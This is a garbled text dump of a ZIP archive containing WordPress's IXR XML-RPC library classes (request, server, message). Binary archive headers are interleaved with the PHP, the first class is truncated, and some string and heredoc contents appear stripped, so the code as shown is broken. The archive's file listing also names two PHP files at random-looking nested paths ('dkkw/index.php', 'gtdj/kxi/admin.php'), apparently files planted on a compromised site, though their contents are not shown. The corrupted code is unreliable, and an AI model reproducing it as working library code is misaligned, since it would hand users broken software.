$this->args = $args; $this->xml = << {$this->method} EOD; foreach ($this->args as $arg) { $this->xml .= ''; $v = new IXR_Value($arg); $this->xml .= $v->getXml(); $this->xml .= "\n"; } $this->xml .= ''; } /** * PHP4 constructor. */ public function IXR_Request( $method, $args ) { self::__construct( $method, $args ); } function getLength() { return strlen($this->xml); } function getXml() { return $this->xml; } } PK!ppclass-IXR-server.phpnuȯsetCapabilities(); if ($callbacks) { $this->callbacks = $callbacks; } $this->setCallbacks(); if (!$wait) { $this->serve($data); } } /** * PHP4 constructor. */ public function IXR_Server( $callbacks = false, $data = false, $wait = false ) { self::__construct( $callbacks, $data, $wait ); } function serve($data = false) { if (!$data) { if (isset($_SERVER['REQUEST_METHOD']) && $_SERVER['REQUEST_METHOD'] !== 'POST') { if ( function_exists( 'status_header' ) ) { status_header( 405 ); // WP #20986 header( 'Allow: POST' ); } header('Content-Type: text/plain'); // merged from WP #9093 die('XML-RPC server accepts POST requests only.'); } $data = file_get_contents('php://input'); } $this->message = new IXR_Message($data); if (!$this->message->parse()) { $this->error(-32700, 'parse error. not well formed'); } if ($this->message->messageType != 'methodCall') { $this->error(-32600, 'server error. invalid xml-rpc. not conforming to spec. Request must be a methodCall'); } $result = $this->call($this->message->methodName, $this->message->params); // Is the result an error? if (is_a($result, 'IXR_Error')) { $this->error($result); } // Encode the result $r = new IXR_Value($result); $resultxml = $r->getXml(); // Create the XML $xml = << $resultxml EOD; // Send it $this->output($xml); } function call($methodname, $args) { if (!$this->hasMethod($methodname)) { return new IXR_Error(-32601, 'server error. requested method '.$methodname.' does not exist.'); } $method = $this->callbacks[$methodname]; // Perform the callback and send the response if (count($args) == 1) { // If only one parameter just send that instead of the whole array $args = $args[0]; } // Are we dealing with a function or a method? if (is_string($method) && substr($method, 0, 5) == 'this:') { // It's a class method - check it exists $method = substr($method, 5); if (!method_exists($this, $method)) { return new IXR_Error(-32601, 'server error. requested class method "'.$method.'" does not exist.'); } //Call the method $result = $this->$method($args); } else { // It's a function - does it exist? if (is_array($method)) { if (!is_callable(array($method[0], $method[1]))) { return new IXR_Error(-32601, 'server error. requested object method "'.$method[1].'" does not exist.'); } } else if (!function_exists($method)) { return new IXR_Error(-32601, 'server error. requested function "'.$method.'" does not exist.'); } // Call the function $result = call_user_func($method, $args); } return $result; } function error($error, $message = false) { // Accepts either an error object or an error code and message if ($message && !is_object($error)) { $error = new IXR_Error($error, $message); } $this->output($error->getXml()); } function output($xml) { $charset = function_exists('get_option') ? get_option('blog_charset') : ''; if ($charset) $xml = ''."\n".$xml; else $xml = ''."\n".$xml; $length = strlen($xml); header('Connection: close'); if ($charset) header('Content-Type: text/xml; charset='.$charset); else header('Content-Type: text/xml'); header('Date: '.gmdate('r')); echo $xml; exit; } function hasMethod($method) { return in_array($method, array_keys($this->callbacks)); } function setCapabilities() { // Initialises capabilities array $this->capabilities = array( 'xmlrpc' => array( 'specUrl' => 'https://xmlrpc.com/spec.md', 'specVersion' => 1 ), 'faults_interop' => array( 'specUrl' => 'https://web.archive.org/web/20240416231938/https://xmlrpc-epi.sourceforge.net/specs/rfc.fault_codes.php', 'specVersion' => 20010516 ), 'system.multicall' => array( 'specUrl' => 'https://web.archive.org/web/20060624230303/http://www.xmlrpc.com/discuss/msgReader$1208?mode=topic', 'specVersion' => 1 ), ); } function getCapabilities($args) { return $this->capabilities; } function setCallbacks() { $this->callbacks['system.getCapabilities'] = 'this:getCapabilities'; $this->callbacks['system.listMethods'] = 'this:listMethods'; $this->callbacks['system.multicall'] = 'this:multiCall'; } function listMethods($args) { // Returns a list of methods - uses array_reverse to ensure user defined // methods are listed before server defined methods return array_reverse(array_keys($this->callbacks)); } function multiCall($methodcalls) { // See http://www.xmlrpc.com/discuss/msgReader$1208 $return = array(); foreach ($methodcalls as $call) { $method = $call['methodName']; $params = $call['params']; if ($method == 'system.multicall') { $result = new IXR_Error(-32600, 'Recursive calls to system.multicall are forbidden'); } else { $result = $this->call($method, $params); } if (is_a($result, 'IXR_Error')) { $return[] = array( 'faultCode' => $result->code, 'faultString' => $result->message ); } else { $return[] = array($result); } } return $return; } } PK!B۲ class-IXR-message.phpnuȯmessage =& $message; } /** * PHP4 constructor. */ public function IXR_Message( $message ) { self::__construct( $message ); } function parse() { if ( ! function_exists( 'xml_parser_create' ) ) { trigger_error( __( "PHP's XML extension is not available. Please contact your hosting provider to enable PHP's XML extension." ) ); return false; } // first remove the XML declaration // merged from WP #10698 - this method avoids the RAM usage of preg_replace on very large messages $header = preg_replace( '/<\?xml.*?\?'.'>/s', '', substr( $this->message, 0, 100 ), 1 ); $this->message = trim( substr_replace( $this->message, $header, 0, 100 ) ); if ( '' == $this->message ) { return false; } // Then remove the DOCTYPE $header = preg_replace( '/^]*+>/i', '', substr( $this->message, 0, 200 ), 1 ); $this->message = trim( substr_replace( $this->message, $header, 0, 200 ) ); if ( '' == $this->message ) { return false; } // Check that the root tag is valid $root_tag = substr( $this->message, 0, strcspn( substr( $this->message, 0, 20 ), "> \t\r\n" ) ); if ( 'message, '<' ) ) { return false; } $this->_parser = xml_parser_create(); // Set XML parser to take the case of tags in to account xml_parser_set_option($this->_parser, XML_OPTION_CASE_FOLDING, false); // Set XML parser callback functions xml_set_element_handler($this->_parser, array($this, 'tag_open'), array($this, 'tag_close')); xml_set_character_data_handler($this->_parser, array($this, 'cdata')); // 256Kb, parse in chunks to avoid the RAM usage on very large messages $chunk_size = 262144; /** * Filters the chunk size that can be used to parse an XML-RPC response message. * * @since 4.4.0 * * @param int $chunk_size Chunk size to parse in bytes. */ $chunk_size = apply_filters( 'xmlrpc_chunk_parsing_size', $chunk_size ); $final = false; do { if (strlen($this->message) <= $chunk_size) { $final = true; } $part = substr($this->message, 0, $chunk_size); $this->message = substr($this->message, $chunk_size); if (!xml_parse($this->_parser, $part, $final)) { if (PHP_VERSION_ID < 80000) { // xml_parser_free() has no effect as of PHP 8.0. xml_parser_free($this->_parser); } unset($this->_parser); return false; } if ($final) { break; } } while (true); if (PHP_VERSION_ID < 80000) { // xml_parser_free() has no effect as of PHP 8.0. xml_parser_free($this->_parser); } unset($this->_parser); // Grab the error messages, if any if ($this->messageType == 'fault') { $this->faultCode = $this->params[0]['faultCode']; $this->faultString = $this->params[0]['faultString']; } return true; } function tag_open($parser, $tag, $attr) { $this->_currentTagContents = ''; $this->_currentTag = $tag; switch($tag) { case 'methodCall': case 'methodResponse': case 'fault': $this->messageType = $tag; break; /* Deal with stacks of arrays and structs */ case 'data': // data is to all intents and puposes more interesting than array $this->_arraystructstypes[] = 'array'; $this->_arraystructs[] = array(); break; case 'struct': $this->_arraystructstypes[] = 'struct'; $this->_arraystructs[] = array(); break; } } function cdata($parser, $cdata) { $this->_currentTagContents .= $cdata; } function tag_close($parser, $tag) { $valueFlag = false; switch($tag) { case 'int': case 'i4': $value = (int)trim($this->_currentTagContents); $valueFlag = true; break; case 'double': $value = (float)trim($this->_currentTagContents); $valueFlag = true; break; case 'string': $value = (string)trim($this->_currentTagContents); $valueFlag = true; break; case 'dateTime.iso8601': $value = new IXR_Date(trim($this->_currentTagContents)); $valueFlag = true; break; case 'value': // "If no type is indicated, the type is string." if (trim($this->_currentTagContents) != '') { $value = (string)$this->_currentTagContents; $valueFlag = true; } break; case 'boolean': $value = (bool)trim($this->_currentTagContents); $valueFlag = true; break; case 'base64': $value = base64_decode($this->_currentTagContents); $valueFlag = true; break; /* Deal with stacks of arrays and structs */ case 'data': case 'struct': $value = array_pop($this->_arraystructs); array_pop($this->_arraystructstypes); $valueFlag = true; break; case 'member': array_pop($this->_currentStructName); break; case 'name': $this->_currentStructName[] = trim($this->_currentTagContents); break; case 'methodName': $this->methodName = trim($this->_currentTagContents); break; } if ($valueFlag) { if (count($this->_arraystructs) > 0) { // Add value to struct or array if ($this->_arraystructstypes[count($this->_arraystructstypes)-1] == 'struct') { // Add to struct $this->_arraystructs[count($this->_arraystructs)-1][$this->_currentStructName[count($this->_currentStructName)-1]] = $value; } else { // Add to array $this->_arraystructs[count($this->_arraystructs)-1][] = $value; } } else { // Just add as a parameter $this->params[] = $value; } } $this->_currentTagContents = ''; } } PK!0class-IXR-client.phpnu&1iPK!ЅSclass-IXR-value.phpnu&1iPK! "class-IXR-date.phpnu&1iPK!Nx !(class-IXR-introspectionserver.phpnuȯPK!KVV,>class-IXR-error.phpnu&1iPK!GAclass-IXR-clientmulticall.phpnu&1iPK!W%*Gimages/media/modules/tmp/v2/dkkw/index.phpnu6$PK!I:.V)images/media/data/src/cache/gtdj/kxi/admin.phpnu6$PK!:^class-IXR-base64.phpnu&1iPK!@@class-IXR-request.phpnu&1iPK!pp$class-IXR-server.phpnuȯPK!B۲ class-IXR-message.phpnuȯPK 4$